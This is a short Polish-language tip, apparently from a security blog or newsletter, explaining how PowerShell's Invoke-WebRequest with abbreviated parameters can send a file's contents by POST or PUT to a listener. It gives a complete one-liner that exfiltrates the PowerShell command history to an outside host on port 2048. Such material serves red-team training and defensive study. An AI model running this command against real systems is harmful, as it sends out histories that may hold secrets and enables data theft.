iwr to dobrze już nam znany
Invoke-WebRequest, do tego brzydko skracamy jego parametry a nawet wartości, czyli:
-me po
- metoda POST, bez skracania byłoby -method post
; możemy również użyć PUT (-me pu)-i <plik>
- wyślij zawartość wskazanego pliku (-InFile <plik>
)http://<host:port>
- docelowy host i port, nawet nie mnusi być to pełnoprawny serwer HTTP, wystarczy prosty listener, np. ten z aptm.in/protip/001b
Żeby więc na przykład wyeksfiltrować historię Powershella na port
2048 hosta
exfil.aptmc.pl moglibyśmy zrobić:
iwr -me po -i (Get-PSReadLineOption).HistorySavePath http://exfil.aptmc.pl:2048
Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.
